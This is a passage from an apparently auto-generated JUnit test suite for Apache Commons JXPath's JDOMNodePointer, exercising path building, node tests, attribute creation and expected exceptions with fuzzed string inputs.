catch(IllegalArgumentException e) { // // // // The name \"M(hC]Ln%:pPF/QH\" is not legal for JDOM/XML attributes: XML names cannot contain the character \"(\". // // // verifyException("org.jdom.Attribute", e); // } } @Test(timeout = 4000) public void test002() throws Throwable { Text text0 = new Text("id('"); Locale locale0 = Locale.GERMAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(text0, locale0); QName qName0 = jDOMNodePointer0.getName(); // Undeclared exception! // try { jDOMNodePointer0.createChild((JXPathContext) null, qName0, (-141), (Object) null); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.NodePointer", e); // } } @Test(timeout = 4000) public void test003() throws Throwable { Object object0 = new Object(); Locale locale0 = Locale.ITALY; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(object0, locale0, "`9?AxHkPo(BEwI#"); boolean boolean0 = jDOMNodePointer0.testNode((NodeTest) null); assertTrue(boolean0); } @Test(timeout = 4000) public void test004() throws Throwable { ProcessingInstructionTest processingInstructionTest0 = new ProcessingInstructionTest("node()"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstructionTest0, (Locale) null, "node()"); boolean boolean0 = jDOMNodePointer0.testNode((NodeTest) processingInstructionTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test005() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.JAPAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); NodeIterator nodeIterator0 = jDOMNodePointer0.namespaceIterator(); assertEquals(0, nodeIterator0.getPosition()); } @Test(timeout = 4000) public void test006() throws Throwable { Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(locale0, locale0, "Z"); boolean boolean0 = jDOMNodePointer0.isLanguage("Z"); assertTrue(boolean0); } @Test(timeout = 4000) public void test007() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); String string0 = jDOMNodePointer0.getNamespaceURI(); assertEquals("org.jdom.CDATA", string0); } @Test(timeout = 4000) public void test008() throws Throwable { JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer((Object) null, (Locale) null, "2NuOtG<a0z#63"); NamespaceResolver namespaceResolver0 = jDOMNodePointer0.getNamespaceResolver(); namespaceResolver0.seal(); NamespaceResolver namespaceResolver1 = jDOMNodePointer0.getNamespaceResolver(); assertTrue(namespaceResolver1.isSealed()); } @Test(timeout = 4000) public void test009() throws Throwable { Locale locale0 = new Locale(""); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(locale0, locale0, ""); String string0 = jDOMNodePointer0.getLanguage(); assertNull(string0); } @Test(timeout = 4000) public void test010() throws Throwable { Locale locale0 = new Locale("LF9AEkRi(QhgB", "LF9AEkRi(QhgB", "LF9AEkRi(QhgB"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer("LF9AEkRi(QhgB", locale0); Object object0 = jDOMNodePointer0.getImmediateNode(); assertEquals("LF9AEkRi(QhgB", object0); } @Test(timeout = 4000) public void test011() throws Throwable { Locale locale0 = new Locale(""); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer((Object) null, locale0, ""); Object object0 = jDOMNodePointer0.getBaseValue(); assertNull(object0); } @Test(timeout = 4000) public void test012() throws Throwable { CDATA cDATA0 = new CDATA("http://www.w3.org/XML/1998/namespace"); Namespace namespace0 = Namespace.getNamespace("VkLKTups", "Cannot remove root JDOM node"); String string0 = JDOMNodePointer.findEnclosingAttribute(cDATA0, "Q},+crT3i", namespace0); assertNull(string0); } @Test(timeout = 4000) public void test013() throws Throwable { Text text0 = new Text("id('"); Locale locale0 = Locale.GERMAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(text0, locale0); QName qName0 = jDOMNodePointer0.getName(); NodeNameTest nodeNameTest0 = new NodeNameTest(qName0, "http://www.w3.org/2000/xmlns/"); NodeIterator nodeIterator0 = jDOMNodePointer0.childIterator(nodeNameTest0, false, jDOMNodePointer0); assertEquals(0, nodeIterator0.getPosition()); } @Test(timeout = 4000) public void test014() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer((NodePointer) null, "org.jdom.CDATA"); NodeNameTest nodeNameTest0 = new NodeNameTest((QName) null, "<<unknown namespace>>"); // Undeclared exception! // try { JDOMNodePointer.testNode((NodePointer) jDOMNodePointer0, (Object) element0, (NodeTest) nodeNameTest0); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.compiler.NodeNameTest", e); // } } @Test(timeout = 4000) public void test015() throws Throwable { Element element0 = new Element("Z", "Z", "Z"); QName qName0 = new QName("Z"); VariablePointer variablePointer0 = new VariablePointer(qName0); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(variablePointer0, element0); // Undeclared exception! // try { jDOMNodePointer0.setValue(variablePointer0); // fail("Expecting exception: RuntimeException"); // } catch(RuntimeException e) { // // // // Undefined variable: Z // // // verifyException("org.apache.commons.jxpath.ri.model.VariablePointer$1", e); // } } @Test(timeout = 4000) public void test016() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); LinkedList<Integer> linkedList0 = new LinkedList<Integer>(); Document document0 = new Document(linkedList0); // Undeclared exception! // try { jDOMNodePointer0.setValue(document0); // fail("Expecting exception: IllegalStateException"); // } catch(IllegalStateException e) { // // // // Root element not set // // // verifyException("org.jdom.Document", e); // } } @Test(timeout = 4000) public void test017() throws Throwable { BasicVariables basicVariables0 = new BasicVariables(); CDATA cDATA0 = new CDATA((String) null); Locale locale0 = Locale.CANADA_FRENCH; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(cDATA0, locale0, (String) null); QName qName0 = jDOMNodePointer0.getName(); VariablePointer variablePointer0 = new VariablePointer(basicVariables0, qName0); // Undeclared exception! // try { jDOMNodePointer0.setValue(variablePointer0); // fail("Expecting exception: IllegalArgumentException"); // } catch(IllegalArgumentException e) { // // // // No such variable: 'null' // // // verifyException("org.apache.commons.jxpath.BasicVariables", e); // } } @Test(timeout = 4000) public void test018() throws Throwable { Locale locale0 = new Locale("LF9AEkRi(QhgB", "LF9AEkRi(QhgB", "LF9AEkRi(QhgB"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer("LF9AEkRi(QhgB", locale0); // Undeclared exception! // try { jDOMNodePointer0.setValue((Object) null); // fail("Expecting exception: ClassCastException"); // } catch(ClassCastException e) { // // // // java.lang.String cannot be cast to org.jdom.Element // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer", e); // } } @Test(timeout = 4000) public void test019() throws Throwable { ProcessingInstructionTest processingInstructionTest0 = new ProcessingInstructionTest("node()"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstructionTest0, (Locale) null, "node()"); // Undeclared exception! // try { jDOMNodePointer0.isLanguage("k"); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.NodePointer", e); // } } @Test(timeout = 4000) public void test020() throws Throwable { QName qName0 = new QName("GBpd&,W#>l\t?-"); NodeNameTest nodeNameTest0 = new NodeNameTest(qName0, "GBpd&,W#>l\t?-"); Locale locale0 = Locale.JAPAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(nodeNameTest0, locale0); // Undeclared exception! // try { jDOMNodePointer0.getNamespaceURI((String) null); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // } } @Test(timeout = 4000) public void test021() throws Throwable { Element element0 = new Element("Z", "Z", "Z"); // Undeclared exception! // try { JDOMNodePointer.findEnclosingAttribute(element0, "http://www.w3.org/XML/1998/namespace", (Namespace) null); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.jdom.AttributeList", e); // } } @Test(timeout = 4000) public void test022() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = new QName("org.jdom.CDATA@0000000003"); // Undeclared exception! // try { jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); // fail("Expecting exception: IllegalArgumentException"); // } catch(IllegalArgumentException e) { // // // // The name \"org.jdom.CDATA@0000000003\" is not legal for JDOM/XML attributes: XML names cannot contain the character \"@\". // // // verifyException("org.jdom.Attribute", e); // } } @Test(timeout = 4000) public void test023() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.JAPAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); // Undeclared exception! // try { jDOMNodePointer0.createAttribute((JXPathContext) null, (QName) null); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer", e); // } } @Test(timeout = 4000) public void test024() throws Throwable { Locale locale0 = Locale.US; ProcessingInstructionTest processingInstructionTest0 = new ProcessingInstructionTest("lL"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstructionTest0, locale0, "/}Anl;1|d8T@"); QName qName0 = jDOMNodePointer0.getName(); VariablePointer variablePointer0 = new VariablePointer(qName0); // Undeclared exception! // try { jDOMNodePointer0.compareChildNodePointers(variablePointer0, (NodePointer) null); // fail("Expecting exception: RuntimeException"); // } catch(RuntimeException e) { // // // // Undefined variable: null // // // verifyException("org.apache.commons.jxpath.ri.model.VariablePointer", e); // } } @Test(timeout = 4000) public void test025() throws Throwable { CDATA cDATA0 = new CDATA(""); Locale locale0 = new Locale(""); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(locale0, locale0, ""); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer(cDATA0, locale0, "_c|}O"); // Undeclared exception! // try { jDOMNodePointer1.compareChildNodePointers(jDOMNodePointer1, jDOMNodePointer0); // fail("Expecting exception: RuntimeException"); // } catch(RuntimeException e) { // // // // JXPath internal error: compareChildNodes called for [CDATA: ] // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer", e); // } } @Test(timeout = 4000) public void test026() throws Throwable { Object object0 = new Object(); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(object0, locale0, "java.lang.Integer@0000000004"); // Undeclared exception! // try { jDOMNodePointer0.compareChildNodePointers((NodePointer) null, (NodePointer) null); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer", e); // } } @Test(timeout = 4000) public void test027() throws Throwable { Comment comment0 = new Comment("_c|}O"); Locale locale0 = Locale.ITALY; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(comment0, locale0, "_c|}O"); BasicVariables basicVariables0 = new BasicVariables(); QName qName0 = jDOMNodePointer0.getName(); VariablePointer variablePointer0 = new VariablePointer(basicVariables0, qName0); // Undeclared exception! // try { jDOMNodePointer0.compareChildNodePointers(variablePointer0, jDOMNodePointer0); // fail("Expecting exception: IllegalArgumentException"); // } catch(IllegalArgumentException e) { // // // // No such variable: 'null' // // // verifyException("org.apache.commons.jxpath.BasicVariables", e); // } } @Test(timeout = 4000) public void test028() throws Throwable { Locale locale0 = new Locale(""); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer((Object) null, locale0, ""); QName qName0 = new QName("http://www.w3.org/XML/1998/namespace", "http://www.w3.org/XML/1998/namespace"); VariablePointer variablePointer0 = new VariablePointer(qName0); NodeTypeTest nodeTypeTest0 = new NodeTypeTest(Integer.MIN_VALUE); // Undeclared exception! // try { jDOMNodePointer0.childIterator(nodeTypeTest0, false, variablePointer0); // fail("Expecting exception: RuntimeException"); // } catch(RuntimeException e) { // // // // Undefined variable: http://www.w3.org/XML/1998/namespace:http://www.w3.org/XML/1998/namespace // // // verifyException("org.apache.commons.jxpath.ri.model.VariablePointer$1", e); // } } @Test(timeout = 4000) public void test029() throws Throwable { Integer integer0 = new Integer((-1336)); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(integer0, locale0, "k>/JC9d I"); NodeNameTest nodeNameTest0 = new NodeNameTest((QName) null, "org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer"); BasicVariables basicVariables0 = new BasicVariables(); VariablePointer variablePointer0 = new VariablePointer(basicVariables0, (QName) null); // Undeclared exception! // try { jDOMNodePointer0.childIterator(nodeNameTest0, true, variablePointer0); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.VariablePointer", e); // } } @Test(timeout = 4000) public void test030() throws Throwable { ProcessingInstructionTest processingInstructionTest0 = new ProcessingInstructionTest("lL"); Locale locale0 = Locale.ITALIAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer("lL", locale0, "lL"); BasicVariables basicVariables0 = new BasicVariables(); QName qName0 = new QName("http://www.w3.org/2000/xmlns/", "lL"); VariablePointer variablePointer0 = new VariablePointer(basicVariables0, qName0); Comment comment0 = new Comment("http://www.w3.org/XML/1998/namespace"); NodePointer nodePointer0 = variablePointer0.createPath((JXPathContext) null, (Object) comment0); // Undeclared exception! // try { jDOMNodePointer0.childIterator(processingInstructionTest0, false, nodePointer0); // // fail("Expecting exception: NoClassDefFoundError"); // Unstable assertion // } catch(NoClassDefFoundError e) { // // // // Could not initialize class org.apache.commons.jxpath.ri.JXPathContextReferenceImpl // // // verifyException("org.apache.commons.jxpath.ri.model.NodePointer", e); // } } @Test(timeout = 4000) public void test031() throws Throwable { Element element0 = new Element("C", "C", "C"); Locale locale0 = Locale.ENGLISH; Document document0 = new Document(element0); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(document0, locale0, "AwB,jI?w?}v\"Ar8;"); NodeTypeTest nodeTypeTest0 = new NodeTypeTest(Integer.MIN_VALUE); LinkedList<NodeTypeTest> linkedList0 = new LinkedList<NodeTypeTest>(); document0.setContent((Collection) linkedList0); // Undeclared exception! // try { jDOMNodePointer0.childIterator(nodeTypeTest0, false, (NodePointer) null); // fail("Expecting exception: IllegalStateException"); // } catch(IllegalStateException e) { // // // // Root element not set // // // verifyException("org.jdom.Document", e); // } } @Test(timeout = 4000) public void test032() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); // Undeclared exception! // try { jDOMNodePointer0.attributeIterator((QName) null); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMAttributeIterator", e); // } } @Test(timeout = 4000) public void test033() throws Throwable { Element element0 = new Element("nU", "nU"); Locale locale0 = Locale.GERMAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer("nU", locale0); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer(jDOMNodePointer0, element0); // Undeclared exception! jDOMNodePointer1.asPath(); } @Test(timeout = 4000) public void test034() throws Throwable { Locale locale0 = Locale.JAPAN; Object object0 = new Object(); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(object0, locale0); String string0 = jDOMNodePointer0.asPath(); assertEquals("", string0); } @Test(timeout = 4000) public void test035() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.ROOT; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); String string0 = jDOMNodePointer0.asPath(); assertEquals("", string0); } @Test(timeout = 4000) public void test036() throws Throwable { Locale locale0 = Locale.UK; NodeTypeTest nodeTypeTest0 = new NodeTypeTest(2999); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(nodeTypeTest0, locale0, "processing-instruction('id('')"); QName qName0 = jDOMNodePointer0.getName(); // Undeclared exception! // try { jDOMNodePointer0.createChild((JXPathContext) null, qName0, Integer.MIN_VALUE); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.NodePointer", e); // } } @Test(timeout = 4000) public void test037() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); String string0 = JDOMNodePointer.getLocalName(element0); assertEquals("org.jdom.CDATA", string0); } @Test(timeout = 4000) public void test038() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); String string0 = JDOMNodePointer.getPrefix(element0); assertNull(string0); } @Test(timeout = 4000) public void test039() throws Throwable { boolean boolean0 = JDOMNodePointer.testNode((NodePointer) null, (Object) null, (NodeTest) null); assertTrue(boolean0); } @Test(timeout = 4000) public void test040() throws Throwable { Text text0 = new Text("id('"); Locale locale0 = Locale.GERMAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(text0, locale0); Object object0 = jDOMNodePointer0.getValue(); assertEquals("id('", object0); } @Test(timeout = 4000) public void test041() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.ROOT; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "Y"); String string0 = jDOMNodePointer0.getNamespaceURI("org.jdom.CDATA"); assertNull(string0); } @Test(timeout = 4000) public void test042() throws Throwable { Locale locale0 = Locale.FRENCH; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer((Object) null, locale0, "NU"); Object object0 = jDOMNodePointer0.getImmediateNode(); assertNull(object0); } @Test(timeout = 4000) public void test043() throws Throwable { Object object0 = new Object(); Locale locale0 = Locale.CANADA; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(object0, locale0); Object object1 = jDOMNodePointer0.getBaseValue(); assertSame(object0, object1); } @Test(timeout = 4000) public void test044() throws Throwable { Element element0 = new Element("B", "B", "B"); Locale locale0 = Locale.GERMANY; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "B"); QName qName0 = new QName("http://www.w3.org/XML/1998/namespace"); NodeIterator nodeIterator0 = jDOMNodePointer0.attributeIterator(qName0); assertEquals(0, nodeIterator0.getPosition()); } @Test(timeout = 4000) public void test045() throws Throwable { Locale locale0 = Locale.CANADA; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(locale0, locale0); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer(jDOMNodePointer0, locale0, "T|.,"); boolean boolean0 = jDOMNodePointer1.equals(jDOMNodePointer0); assertFalse(boolean0); } @Test(timeout = 4000) public void test046() throws Throwable { Object object0 = new Object(); Locale locale0 = Locale.CANADA; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(object0, locale0); boolean boolean0 = jDOMNodePointer0.equals(locale0); assertFalse(boolean0); } @Test(timeout = 4000) public void test047() throws Throwable { CDATA cDATA0 = new CDATA("Namespace prefixes cannot begin with a period (.)"); Locale locale0 = Locale.ENGLISH; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(cDATA0, locale0); boolean boolean0 = jDOMNodePointer0.equals(jDOMNodePointer0); assertTrue(boolean0); } @Test(timeout = 4000) public void test048() throws Throwable { Locale locale0 = Locale.CANADA; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(locale0, locale0); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer(locale0, locale0); boolean boolean0 = jDOMNodePointer0.equals(jDOMNodePointer1); assertTrue(boolean0); } @Test(timeout = 4000) public void test049() throws Throwable { Locale locale0 = Locale.TAIWAN; ProcessingInstruction processingInstruction0 = new ProcessingInstruction("org.jdom.CDATA", "org.jdom.CDATA"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstruction0, locale0); String string0 = jDOMNodePointer0.asPath(); assertEquals("/processing-instruction('org.jdom.CDATA')[1]", string0); } @Test(timeout = 4000) public void test050() throws Throwable { CDATA cDATA0 = new CDATA(""); Locale locale0 = Locale.FRENCH; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(cDATA0, locale0); String string0 = jDOMNodePointer0.asPath(); assertEquals("/text()[1]", string0); } @Test(timeout = 4000) public void test051() throws Throwable { Element element0 = new Element("Z", "Z", "Z"); Locale locale0 = Locale.PRC; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "Z"); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer(jDOMNodePointer0, element0); String string0 = jDOMNodePointer1.asPath(); assertEquals("id('Z')/Z:Z[1]", string0); } @Test(timeout = 4000) public void test052() throws Throwable { Element element0 = new Element("Z", "Z", "Z"); Locale locale0 = Locale.PRC; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0, "Z"); String string0 = jDOMNodePointer0.asPath(); assertEquals("id('Z')", string0); } @Test(timeout = 4000) public void test053() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.JAPAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = new QName("org.jdom.CDATA"); jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); NodePointer nodePointer0 = jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); assertEquals(Integer.MIN_VALUE, NodePointer.WHOLE_COLLECTION); } @Test(timeout = 4000) public void test054() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.TAIWAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = jDOMNodePointer0.getName(); jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); assertEquals("org.jdom.CDATA:org.jdom.CDATA", qName0.toString()); } @Test(timeout = 4000) public void test055() throws Throwable { JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer((NodePointer) null, (Object) null); QName qName0 = jDOMNodePointer0.getName(); // Undeclared exception! // try { jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); // fail("Expecting exception: RuntimeException"); // } catch(RuntimeException e) { // // // // Cannot create an attribute for path /@null, operation is not allowed for this type of node // // // verifyException("org.apache.commons.jxpath.ri.model.NodePointer", e); // } } @Test(timeout = 4000) public void test056() throws Throwable { Locale locale0 = Locale.UK; NodeTypeTest nodeTypeTest0 = new NodeTypeTest(2999); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(nodeTypeTest0, locale0, "processing-instruction('id('')"); QName qName0 = jDOMNodePointer0.getName(); // Undeclared exception! // try { jDOMNodePointer0.createChild((JXPathContext) null, qName0, (-2084377906)); // fail("Expecting exception: NullPointerException"); // } catch(NullPointerException e) { // // // // no message in exception (getMessage() returned null) // // // verifyException("org.apache.commons.jxpath.ri.model.NodePointer", e); // } } @Test(timeout = 4000) public void test057() throws Throwable { Comment comment0 = new Comment("drug"); Locale locale0 = Locale.SIMPLIFIED_CHINESE; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(comment0, locale0); // Undeclared exception! // try { jDOMNodePointer0.remove(); // fail("Expecting exception: RuntimeException"); // } catch(RuntimeException e) { // // // // Cannot remove root JDOM node // // // verifyException("org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer", e); // } } @Test(timeout = 4000) public void test058() throws Throwable { Attribute attribute0 = new Attribute("preserve", "y;DxuV3tx"); String string0 = JDOMNodePointer.getLocalName(attribute0); assertEquals("preserve", string0); } @Test(timeout = 4000) public void test059() throws Throwable { Object object0 = new Object(); String string0 = JDOMNodePointer.getLocalName(object0); assertNull(string0); } @Test(timeout = 4000) public void test060() throws Throwable { Namespace namespace0 = Namespace.XML_NAMESPACE; Attribute attribute0 = new Attribute("Z", "java.nio.charset.CharsetEncoder", namespace0); String string0 = JDOMNodePointer.getPrefix(attribute0); assertEquals("xml", string0); assertNotNull(string0); } @Test(timeout = 4000) public void test061() throws Throwable { Namespace namespace0 = Namespace.NO_NAMESPACE; Attribute attribute0 = new Attribute("org.jdom.CDATA", "org.jdom.CDATA", namespace0); String string0 = JDOMNodePointer.getPrefix(attribute0); assertNull(string0); } @Test(timeout = 4000) public void test062() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Namespace namespace0 = Namespace.XML_NAMESPACE; Element element1 = element0.setNamespace(namespace0); String string0 = JDOMNodePointer.getPrefix(element1); assertEquals("xml", string0); assertNotNull(string0); } @Test(timeout = 4000) public void test063() throws Throwable { String string0 = JDOMNodePointer.getPrefix((Object) null); assertNull(string0); } @Test(timeout = 4000) public void test064() throws Throwable { Object object0 = new Object(); Locale locale0 = Locale.CANADA; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(object0, locale0); ProcessingInstructionTest processingInstructionTest0 = new ProcessingInstructionTest("<<unknown namespace>>"); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) jDOMNodePointer0, (Object) processingInstructionTest0, (NodeTest) processingInstructionTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test065() throws Throwable { NodeTypeTest nodeTypeTest0 = new NodeTypeTest(2); Text text0 = new Text("http://www.w3.org/2000/xmlns/"); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) null, (Object) text0, (NodeTest) nodeTypeTest0); assertTrue(boolean0); } @Test(timeout = 4000) public void test066() throws Throwable { Text text0 = new Text("id('"); Locale locale0 = Locale.GERMAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(text0, locale0, "[ProcessingInstruction: "); NamespaceResolver namespaceResolver0 = jDOMNodePointer0.getNamespaceResolver(); NodeTypeTest nodeTypeTest0 = new NodeTypeTest(Integer.MIN_VALUE); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) jDOMNodePointer0, (Object) namespaceResolver0, (NodeTest) nodeTypeTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test067() throws Throwable { Namespace namespace0 = Namespace.NO_NAMESPACE; NodeTypeTest nodeTypeTest0 = new NodeTypeTest(3); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) null, (Object) namespace0, (NodeTest) nodeTypeTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test068() throws Throwable { NodeTypeTest nodeTypeTest0 = new NodeTypeTest(2); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) null, (Object) null, (NodeTest) nodeTypeTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test069() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, (Locale) null); NodeTypeTest nodeTypeTest0 = new NodeTypeTest(1); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) jDOMNodePointer0, (Object) element0, (NodeTest) nodeTypeTest0); assertTrue(boolean0); } @Test(timeout = 4000) public void test070() throws Throwable { NodeTypeTest nodeTypeTest0 = new NodeTypeTest(4); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) null, (Object) nodeTypeTest0, (NodeTest) nodeTypeTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test071() throws Throwable { Element element0 = new Element("space"); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, (Locale) null); QName qName0 = new QName("space"); NodePointer nodePointer0 = jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); NodeNameTest nodeNameTest0 = new NodeNameTest(qName0, "space"); boolean boolean0 = JDOMNodePointer.testNode(nodePointer0, (Object) element0, (NodeTest) nodeNameTest0); assertTrue(boolean0); } @Test(timeout = 4000) public void test072() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA", "org.jdom.CDATA"); Locale locale0 = Locale.JAPAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = new QName("org.jdom.CDATA"); NodePointer nodePointer0 = jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); NodeNameTest nodeNameTest0 = new NodeNameTest(qName0); boolean boolean0 = JDOMNodePointer.testNode(nodePointer0, (Object) element0, (NodeTest) nodeNameTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test073() throws Throwable { Element element0 = new Element("org.jdom.CDATA"); Locale locale0 = Locale.JAPAN; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = new QName("org.jdom.CDATA"); NodePointer nodePointer0 = jDOMNodePointer0.createAttribute((JXPathContext) null, qName0); NodeNameTest nodeNameTest0 = new NodeNameTest(qName0); boolean boolean0 = JDOMNodePointer.testNode(nodePointer0, (Object) element0, (NodeTest) nodeNameTest0); assertTrue(boolean0); } @Test(timeout = 4000) public void test074() throws Throwable { Element element0 = new Element("Z"); Locale locale0 = Locale.GERMANY; JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(element0, locale0); QName qName0 = new QName("http://www.w3.org/XML/1998/namespace", "Z"); NodeNameTest nodeNameTest0 = new NodeNameTest(qName0, "Cannot comp4re pointers that do noO belong to the same treJ: '"); boolean boolean0 = JDOMNodePointer.testNode((NodePointer) jDOMNodePointer0, (Object) element0, (NodeTest) nodeNameTest0); assertFalse(boolean0); } @Test(timeout = 4000) public void test075() throws Throwable { Element element0 = new 